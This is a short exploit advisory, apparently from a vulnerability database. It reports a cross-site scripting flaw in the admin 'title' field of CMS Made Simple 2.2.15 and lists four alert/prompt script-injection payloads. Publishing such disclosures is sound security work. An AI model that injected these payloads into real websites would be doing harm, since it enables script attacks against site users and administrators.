CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)

2021.05.03

Ali Seddigh (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

|===========================================================================
| # Exploit Title : CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip
|
| # Vendor Homepage : http://www.cmsmadesimple.org/
|
| # Tested on : [ Windows ~> 10 ]
|
| # Version : 2.2.15
|
| # Date : 2021-05-03
|===========================================================================
If you log into Admin panel and open My Preferences you could be able to exploit XSS in title field
Reflected XSS in /admin/addbookmark.php
Some payloads that works:
"><script>prompt(1)</script><"
"><script>alert(1)</script><"
63311';alert(1)//812
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.